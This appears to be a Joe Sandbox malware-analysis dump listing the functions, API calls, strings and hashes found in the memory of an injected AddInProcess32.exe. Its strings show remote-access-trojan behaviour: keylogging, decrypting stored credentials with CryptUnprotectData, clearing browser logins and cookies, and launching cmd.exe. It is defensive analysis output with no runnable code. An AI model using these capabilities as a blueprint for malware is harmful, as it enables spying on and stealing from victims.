                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                    • String ID: *?$.
                                                                                                    • API String ID: 2812119850-3972193922
                                                                                                    • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                                                    • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                                                                                    • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                                                    • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __alloca_probe_16__freea
                                                                                                    • String ID: H"G$H"GH"G
                                                                                                    • API String ID: 1635606685-3036711414
                                                                                                    • Opcode ID: 555ec4e0c8b1f5d88c31e68ad14176f7f04aa6e83ff71048a690955ca7fb9b0a
                                                                                                    • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                                                                                    • Opcode Fuzzy Hash: 555ec4e0c8b1f5d88c31e68ad14176f7f04aa6e83ff71048a690955ca7fb9b0a
                                                                                                    • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040189E
                                                                                                    • ExitThread.KERNEL32 ref: 004018D6
                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                                                                      • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                    • String ID: 8:G
                                                                                                    • API String ID: 1649129571-405301104
                                                                                                    • Opcode ID: ea0c0774d0d22f6c318a5de50af6ef7306ec5c995fc45d7a43d0569f9d0f6140
                                                                                                    • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                                                                                    • Opcode Fuzzy Hash: ea0c0774d0d22f6c318a5de50af6ef7306ec5c995fc45d7a43d0569f9d0f6140
                                                                                                    • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00440975
                                                                                                    • _free.LIBCMT ref: 00440A40
                                                                                                    • _free.LIBCMT ref: 00440A4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                    • API String ID: 2506810119-760905667
                                                                                                    • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                                                    • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                                                                                    • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                                                    • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                                      • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                                      • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                                      • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                                    • _wcslen.LIBCMT ref: 00419744
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                    • String ID: .exe$program files (x86)\$program files\
                                                                                                    • API String ID: 37874593-1203593143
                                                                                                    • Opcode ID: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
                                                                                                    • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                                                                                    • Opcode Fuzzy Hash: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
                                                                                                    • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                                    • wsprintfW.USER32 ref: 0040A13F
                                                                                                      • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                    • API String ID: 1497725170-1359877963
                                                                                                    • Opcode ID: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
                                                                                                    • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                                                                                    • Opcode Fuzzy Hash: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
                                                                                                    • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                                      • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                    • String ID: Online Keylogger Started
                                                                                                    • API String ID: 112202259-1258561607
                                                                                                    • Opcode ID: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
                                                                                                    • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                                                                                    • Opcode Fuzzy Hash: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
                                                                                                    • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: CryptUnprotectData$crypt32
                                                                                                    • API String ID: 2574300362-2380590389
                                                                                                    • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                                                    • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                                                                                    • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                                                    • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004051AA
                                                                                                    • SetEvent.KERNEL32(?), ref: 004051B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEventHandleObjectSingleWait
                                                                                                    • String ID: Connection Timeout
                                                                                                    • API String ID: 2055531096-499159329
                                                                                                    • Opcode ID: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                                                                                    • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                                                                                    • Opcode Fuzzy Hash: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                                                                                    • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 2005118841-1866435925
                                                                                                    • Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                                                                                    • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                                                                                    • Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                                                                                    • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                                                                                    APIs
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteShell
                                                                                                    • String ID: /C $cmd.exe$open
                                                                                                    • API String ID: 587946157-3896048727
                                                                                                    • Opcode ID: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
                                                                                                    • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                                                                                    • Opcode Fuzzy Hash: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
                                                                                                    • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                                    Strings
                                                                                                    • http\shell\open\command, xrefs: 00412026
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: http\shell\open\command
                                                                                                    • API String ID: 3677997916-1487954565
                                                                                                    • Opcode ID: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
                                                                                                    • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                                                                                    • Opcode Fuzzy Hash: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
                                                                                                    • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                                                                                    APIs
                                                                                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
                                                                                                    • RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValue
                                                                                                    • String ID: pth_unenc
                                                                                                    • API String ID: 1818849710-4028850238
                                                                                                    • Opcode ID: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
                                                                                                    • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                                                                                    • Opcode Fuzzy Hash: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
                                                                                                    • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                                                                      • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                                                                      • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 3628047217-1405518554
                                                                                                    • Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                                                                                    • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                                                                                    • Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                                                                                    • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                                                                                    APIs
                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                                                    • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValue
                                                                                                    • String ID: P0F
                                                                                                    • API String ID: 1818849710-3540264436
                                                                                                    • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                                                    • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                                                                                    • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                                                    • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetCursorInfo$User32.dll
                                                                                                    • API String ID: 1646373207-2714051624
                                                                                                    • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                                                    • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                                                                                    • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                                                    • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: GetLastInputInfo$User32.dll
                                                                                                    • API String ID: 2574300362-1519888992
                                                                                                    • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                                                    • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                                                                                    • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                                                    • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                                                                                    • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                                                                                    • Opcode Fuzzy Hash: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                                                                                    • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                                                    • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                                                                                    • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                                                    • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                                                    • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                                                                                    • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                                                    • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3360349984-0
                                                                                                    • Opcode ID: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
                                                                                                    • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                                                                                    • Opcode Fuzzy Hash: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
                                                                                                    • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                                                                                    • Cleared browsers logins and cookies., xrefs: 0040B036
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                    • API String ID: 3472027048-1236744412
                                                                                                    • Opcode ID: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
                                                                                                    • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                                                                                    • Opcode Fuzzy Hash: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
                                                                                                    • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                                                                                    APIs
                                                                                                      • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                                                      • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                                                      • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQuerySleepValue
                                                                                                    • String ID: H"G$exepath$!G
                                                                                                    • API String ID: 4119054056-2148977334
                                                                                                    • Opcode ID: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
                                                                                                    • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                                                                                    • Opcode Fuzzy Hash: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
                                                                                                    • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                                                                      • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                                                                      • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040955A
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004095F5
                                                                                                    Strings
                                                                                                    Memory Dump Source
